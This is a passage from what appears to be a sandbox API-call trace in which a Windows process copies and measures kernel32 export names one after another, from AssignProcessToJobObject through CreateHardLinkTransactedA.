lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.977] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.977] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.977] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.977] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.977] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.977] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.977] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.977] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.977] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.977] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.977] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.977] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.977] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.977] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.977] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.977] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.978] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.978] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.978] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.978] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.978] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.978] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.978] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.978] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.978] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.978] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.978] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.978] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.978] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.978] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.978] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.978] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.978] lstrlenA (lpString="BEEP") returned 4 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.978] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.978] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.979] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.979] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.979] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.979] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.979] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.979] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.979] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.979] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.979] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.979] lstrlenA (lpString="CANCELIO") returned 8 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.979] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.979] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.979] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.979] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.979] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.979] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.979] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.979] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.979] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.980] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.980] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.980] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.980] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.980] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.980] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.980] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.980] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.980] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.980] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.980] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.980] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.980] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.980] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.980] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.980] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.980] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.980] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.980] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.981] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.981] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.981] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.981] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.981] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.981] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.981] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.981] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.981] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.981] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.981] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.981] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.981] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.981] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.981] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.981] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.981] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.981] lstrlenA (lpString="COPYFILEA") returned 9 [0083.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.981] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.982] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.982] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.982] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.982] lstrlenA (lpString="COPYFILEW") returned 9 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.982] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.982] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.982] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.982] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.982] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.982] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.982] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.982] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.982] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.982] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.982] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.982] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.982] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.982] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.982] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.983] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.983] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.983] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.983] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.983] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.983] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.983] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.983] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.983] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.983] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.983] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.983] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.983] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.983] lstrcpyA (in: 